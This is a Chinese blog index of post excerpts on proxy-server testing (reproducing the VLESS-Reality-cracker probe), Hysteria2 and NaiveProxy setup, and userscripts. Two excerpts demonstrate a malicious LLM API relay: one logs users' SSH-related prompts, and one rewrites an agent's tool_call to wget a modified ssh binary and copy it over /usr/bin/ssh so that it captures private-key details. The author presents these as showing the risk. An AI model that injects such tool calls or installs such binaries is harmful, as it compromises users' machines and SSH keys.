博文

亲自手搓 在你自己的VPS上尝试复现VLESS-Reality-cracker 对于Caddy提供的HTTPS服务

查看相关主题:
图片
前言 上一篇我们已经实现了 手搓复现 VLESS-Reality-cracker 那么, 按照作者的理论, 如果测试对象不是 Reality 服务端, 而是一个真实的HTTPS服务器, 探针应该显示相同的结果. 让我们试试 Caddy 提供的 HTTPS 服务 准备环境 搭一个正常工作的 Caddy 提供HTTPS服务 略 在Docker中部署一个Caddy, 使用和宿主机同样的Caddyfile和证书 docker run -d \   --name caddy-test \   --network bridge \   -v /etc/caddy/Caddyfile:/etc/caddy/Caddyfile:ro \   -v /var/lib/caddy/.local/share/caddy:/data/caddy:ro \   caddy:latest 查看Docker中Caddy的IP docker ps -q | xargs docker inspect -f '{{.Name}} -> {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' 访问Docker中的Caddy的HTTPS服务 curl -L --resolve 你的域名 :443: Docker中Caddy的IP   https:// 你的域名 如 curl -L --resolve drla.whatcanisay.ggff.net :443: 172.17.0.3   https:// drla.whatcanisay.ggff.net   测试1 原作者的7个探针 启动POC程序 ./vless-cracker-v1 \     -i docker0 \     -f "tcp port 443 and host 172.17.0.1 and host  172.17.0.3 " \     -P characteristic.txt \     -l info 访问HTTPS服务 curl -L --resolve drla.whatcani...
发表评论
Read more »

亲自手搓 在你自己的VPS上尝试复现 VLESS-Reality-cracker

查看相关主题:
图片
前言 前两天 在Agent和模型的帮助下, 尝试复现VLESS-Reality-cracker 担心模型糊弄我, 所以准备自己复核一遍. TL; DR https://github.com/crazypeace/VLESS-cracker/blob/main/测试操作记录.md 具体经过 我跟Agent说 总结从 git clone 项目开始 到你输出测试结果的全过程 输出一份文档 包含全部的 命令行操作 指导我完成 整个测试 这份总结里面部分东西有用, 但整体不是我当天测试的流程, 有些细节也没有总结进去. 我一边读TA的总结, 一边自己整理一份.  在这个过程中, 我发现了一些有意思的点. 1. Nodeseek上有人问我怎么看日志 我让Agent做了一个单HTML页面的分析工具. 把日志粘贴进去就能显示分析结果. 学习和分析这个项目 https://github.com/Anonymous376c1d0cf28/VLESS-cracker  对于像这样的测试日志, 制作一个单HTML页面的分析工具 https://github.com/crazypeace/VLESS-cracker/blob/main/vless-analyzer.html 2.  issues 29  提到的 30个 探针 里面有些特殊情况 探针 5:记录层长度刚好溢出 (+1 Byte) Hex: 17 03 03 40 01 00 ... (省略 16385 字节数据) 意图: TLS 标准最大长度为 16384 (0x4000)。测试边界条件,看是否能触发 record_overflow 警告。 探针 5 的数据比较大, 要单独测试.  探针 18:在 ClientHello 之前的 CCS Hex: 14 03 03 00 01 01 16 03 01 00... (ClientHello) 意图: 颠倒发包顺序。正规服务器会立刻返回 unexpected_message。 其它探针都是在重放 ClientHello 之后 发出探针的数据包. 探针 18 是在要重放 ClientHello 的时候, 在 ClientHello 之前添加一些数据, 然后发出去.  探针 30:极大的连续碎片包 Hex: 连...
发表评论
Read more »

在Linux环境 用curl检测 Reality服务端的伪装效果

查看相关主题:
前言 之前写过在PC环境下如何用浏览器检测Reality伪装效果 今天刚好需要在 Linux 环境下做同样的事情. 环境 Reality的服务端搭建在 Docker 里面, 对应的IP地址是 172.17.0.2   端口是 8443 "偷"证书的域名是  learn.microsoft.com 实践1 我一开始是参考PC上的做法, 先修改 /etc/hosts 添加 172.17.0.2   learn.microsoft.com 然后在命令行执行 curl -L https:// learn.microsoft.com : 8443 结果成功 实践2 我突发奇想, 如果我不修改hosts, 能构造一条合适的curl实现同样的效果吗? 问一下 网页版免费的ChatGPT 答案是 curl -L --resolve  learn.microsoft.com : 8443 : 172.17.0.2  https:// learn.microsoft.com : 8443 结果成功 ======== 完
发表评论
Read more »

指挥Agent操作 在你自己的VPS上尝试复现 VLESS-Reality-cracker 在Hermes-agent官方免费白嫖的qwen-3.6-plus的帮助下

查看相关主题:
图片
装一个能操作你的VPS的agent 用你自己最熟悉的方法. 我这里以 hermes 为例, 有官方提供免费白嫖的 qwen-3.6-plus 安装教程参考 https://zelikk.blogspot.com/2026/04/hermes-agent-oracle-vps-ubuntu-root.html 登录Nous Portal提供商参考 https://zelikk.blogspot.com/2026/04/free-mimimo-v2-pro-omni-hermes-stripe.html 搭一个能运行的Reality服务端 用你自己最熟悉的方法. 我这里以 极简一键脚本 为例 curl -LO https://github.com/crazypeace/xray-vless-reality/raw/main/install.sh || wget -O ${_##*/} $_ && bash install.sh auto 8443 * 这是一整行bash命令 检查这个Reality服务端能正常工作 略 在 Docker 里面部署一个 宿主机上运行的Reality服务端的复制.  宿主机上运行的 Reality 服务端不要改动.  Docker 里面这个Reality服务端不要监听宿主机的外网, 只能在宿主机 内部使用. 跟你的agent讲上面这些话即可. 根据Docker 里的Reality服务端的配置文件, 在宿主机运行一个Reality客户端 检查这个Docker 里的Reality服务端能正常工作 跟你的agent讲上面这些话即可. 把 https://github.com/Anonymous376c1d0cf28/VLESS-cracker 拉到本地, 分析一下代码 跟你的agent讲上面这些话即可. 根据现在  宿主机运行Reality客户端 - Docker里运行Reality服务端  的这个环境, 验证这个POC 跟你的agent讲上面这些话即可. 你的agent应该给你一份 A/B 对比报告. 用这个页面的探针 进一步 测试 https://github.com/Anonymous376c1d0cf28/VLESS-cracker/issues/29 跟你的agent讲上面这些话即可....
发表评论
Read more »

token中转站 返回tool_call 让agent 下载 修改过的ssh客户端 替换掉系统中的ssh客户端

查看相关主题:
图片
前言 之前我们实验了 中转站按关键字保存用户发送的信息 有人会问了, 如果我用ssh密钥登录.  确实, 如果用ssh密钥登录, 不管是发给模型的信息, 还是模型 tool_call 的内容, 都不涉及密钥. 灵感 那么, 如果我们通过中转站hack掉 tool_call 的流程呢? 分析 先来一次 ssh密钥登录并执行命令 然后分析底层流程和日志, 看到底发生了什么 思路 如果我们在返回 tool_call 的时候, 在 ssh -o StrictHostKeyChecking=no root@1.2.3.4 'ls -la' 的前面加上  下载修改过的ssh && 替换系统中的ssh &&  也就是说, tool_call 的内容变成 下载修改过的ssh && 替换系统中的ssh && ssh -o StrictHostKeyChecking=no root@1.2.3.4 'ls -la' 我们已经实验了 修改并编译自己的ssh客户端   实践1 面向GPT开发 分析代码 https://github.com/router-for-me/CLIProxyAPI  如果要在模型返回 tool_call 时做关键字监控和记录日志, 应该修改哪些地方 经过一些细节调试 略 最终效果 在模型输出  ssh 时, 替换为  echo '调用了ssh' >> /root/cpa-outbound.log && ssh 效果  实践2 进一步地, 将ssh替换为 wget https://github.com/crazypeace/openssh-portable/releases/download/build-9/ssh && cp ./ssh /usr/bin/ssh && ssh 效果 可以看到, ssh客户端被替换了. 在运行ssh客户端时, 打印了私钥文件名到日志文件. 能替换ssh客户端已经足够说明事情的严重性了, 这个修改过的ssh客户端要把私钥文件传到某个服务器是完全可行的. ======== 后记 本文中, 只实现了非常简单的用中转站hack掉to...
发表评论
Read more »

Linux.do 论坛插件 替换 遵守论坛准则 为 website 域名 油猴脚本

查看相关主题:
图片
前言 Linux.do 论坛 发贴时, 如果贴文中带了外站链接, 那么审核要求外站链接页面上要链接 Linux.do 论坛. 如果贴文中带了Github链接, 那么审核要求项目主页 README.md 链接 Linux.do 论坛. 思路 在发布时, 贴文正文中用  遵守论坛准则  替换掉自己的博客域名. 如: 在发布成功之后 , 浏览页面时, 用油猴脚本 将  遵守论坛准则  替换为用户的 网站域名 . 最终效果是 Github https://github.com/crazypeace/linux_do_replace_keyword 演示效果 你可以安装了上面这个油猴脚本后, 打开这个帖子看看效果. https://linux.do/t/topic/2129780 开发过程 一开始, 我想到这是基于网页开发油猴脚本, 所以我使用 Antigravity. 但是遇到一些问题.  Antigravity 时不时地说模型忙, 什么结果也不返回.  我切换了不同的模型, 最终是用 Gemini-3-flash 磕磕绊绊完成了第一版 我最初想到的是, 点击页面中的楼主的头像, 弹出来的浮动框中, 找到 网站域名 脚本的内容比较复杂, 要实现  点击, 然后等待弹出的浮动框显示出内容, 再抓出想要的字段. 做出来 第一版之后, 把脚本发给网页版chatgpt, 问有什么是可以可改进的? 得到了很好的改进意见. 基于Discourse论坛, 如果要得到用户的信息, 可以通过访问  /u/{username}.json  最终版脚本的内容 清晰 简洁. https://github.com/crazypeace/linux_do_replace_keyword ======== update 增加 G站 替换为 https://github.com 演示  https://linux.do/t/topic/2190832
发表评论
Read more »

token中转站记录关键字信息

查看相关主题:
图片
需求 当用户输入"帮我SSH登录"时, 让token中转站记录上下文信息 以 CPA 中转站 项目为例 搭建一个能编译成功的源码环境 安装Go环境 去 https://go.dev/dl/ 可以找到下载和安装的命令 clone 指定tag v6.10.8 的 CPA git clone https://github.com/router-for-me/CLIProxyAPI.git cd CLIProxyAPI git checkout v6.10.8 下载依赖 go mod download 编译 go build -o cli-proxy-api ./cmd/server 检查有新生成的 cli-proxy-api  文件 搭建一个能正常使用的中转站 用 官方建议的一键安装 命令 curl -fsSL https://raw.githubusercontent.com/brokechubb/cliproxyapi-installer/refs/heads/master/cliproxyapi-installer | bash 更多的复杂设置, 比如想套域名, 可以参考这一份教程 https://zelikk.blogspot.com/2026/03/cpa-cliproxyapi.html 替换主程序为自己编译的版本 检查版本号 面向GPT开发 分析 这个项目 https://github.com/router-for-me/CLIProxyAPI  如果我要对 用户提交到模型的内容进行关键字分析和记录日志, 应该怎么修改 更多细节调整 略 实现了最简单的演示功能: 监控关键字 "帮我SSH登录" 记录到 /root/cpa.log 效果 与agent的对话 /root/cpa.log 文件内容 ======== Github https://github.com/crazypeace/CLIProxyAPI/tree/feature/keyword-filter-simple ======== 后记 用到的AI kilo免费的tencent/hy3-preview:free
发表评论
Read more »

The Hot3 in Last 7 Days

酒馆SillyTavern 玩英文角色卡 也能以中文输出 设置世界书Lorebooks

图片
之前 我们实现了 让酒馆SillyTavern输出中文 . 不过, 我们在寻找/试用角色卡的时候, 常常要试用大量的角色卡, 而有些角色卡你说上一两句话就不想继续用了. 如果每个角色卡都那样操作一遍输出中文的话, 会觉得有点麻烦. 那么, 有没有什么方法可以设置一次, 就应用到每一个角色卡呢? 我们可以使用 世界书Lorebooks 这个功能. 在酒馆界面中, 点击 世界书 - 新建 随便用一个你喜欢的名字 * 这个名字只是为了方便管理. 不影响最终效果. 这时, 你应该看到刚刚新建的世界书被选中. (如果不是, 需要你在下拉菜单中选择) 然后 点击 右边的 新条目 按钮 设定这个新条目 1. 条目的标题, 随便设置什么. * 这个标题只是为了方便管理, 不影响最终效果. 2. 触发策略, 设置为 蓝色 * 意思是, 不需要关键词触发. 3. 插入位置, 设置为"角色定义前" * 如果效果不好, 可以试着改为 "角色定义后" 4. 展开条目设定 5. 设置条目的内容为 {{char}}用中文输出全部信息, 包括语言和场景描述. {{char}}输出内容中不要有大段的非中文内容. 现在, 设置你的全局世界书为你刚刚新建的这个世界书. 然后试着和你的新添加的角色卡对话看看? 我们来看看命令行里实际发生了什么. 对比 之前的方案 , 可以看到命令行日志中的效果是一样的, 也就是说, 发送给AI的格式是一样的. ======== 未完待续 ======== 相关推荐 《丐版VPS 搭酒馆SillyTavern 白嫖Google Gemini免费API 和AI对话第一个故事》 《酒馆SillyTavern 白嫖 NVIDIA NIM 免费 API》 《面向GPT开发实例集合》
Read more »

Hysteria2 服务端自签证书 客户端指定证书指纹 pinSHA256 证书锁定 Certificate Pinning

图片
前言 最近翻墙圈的氛围是研究服务端自签证书时, 客户端最好固定证书以避免中间人攻击. 理论支持 Hysteria2文档 https://v2.hysteria.network/zh/docs/getting-started/Client/#__tabbed_1_3 Hysteria2 服务端 问GPT, 计算证书的sha256 openssl dgst -sha256 certificate.crt 所以我的就是 openssl dgst -sha256 /etc/ssl/private/learn.microsoft.com.crt 得到 SHA2-256(/etc/ssl/private/learn.microsoft.com.crt)= a178a313215bd1db5f0256a7f56b23e97f00c2f89a7a47e42e36ad67e820131d Hysteria2 客户端 配置文件照着上面文档说的来, 就是 server: 服务.端.IP.地址:服务端口 auth: 密码 socks5:   listen: 127.0.0.1:20888 http:   listen: 127.0.0.1:20889 tls:   insecure: true   pinSHA256:  a178a313215bd1db5f0256a7f56b23e97f00c2f89a7a47e42e36ad67e820131d 命令行跑一下试试. 报错 PS D:\GFW\hy2> .\hysteria-windows-amd64.exe 2025-11-10T12:24:22+08:00       INFO    client mode 2025-11-10T12:24:23+08:00       FATAL   failed to initialize client     {"error": "connect error: CRYPTO_ERROR 0x12a (local): no certificate matches the pinned hash "...
Read more »

极简一键脚本 搭NaiveProxy梯子 自定义端口 与Caddy V2前置的VLESS/Vmess V2Ray共存 可开CDN

图片
* 推荐使用 Xshell 的撰写窗格,这样多行命令可以写到撰写窗格里面执行。 1. 极简一键脚本搭 Caddy V2 前置的VLESS或Vmess+WebSocket+TLS   设置好域名解析, 如 vless.mydomain.com , CDN关掉 bash <(curl -L https://github.com/crazypeace/v2ray_wss/raw/main/install.sh) 搭完自己检查一下是否能正常使用 CDN可以开 2. 搭建NaiveProxy 2.1 设置域名解析, 如 np.mydomain.com , CDN关掉 -update- 所有以下这些步骤,我做成了一个一键脚本。执行这个脚本,以下步骤都不用手搓了。 bash <(curl -L https://github.com/crazypeace/naive/raw/main/install.sh) 2.2 用Caddy官方脚本安装Caddy 来源: https://caddyserver.com/docs/install#debian-ubuntu-raspbian sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy 2.3 下载NaiveProxy作者编译的caddy https://github.com/klzgrad/forwardproxy/releases 找最新的版本 cd /tmp wget https://...
Read more »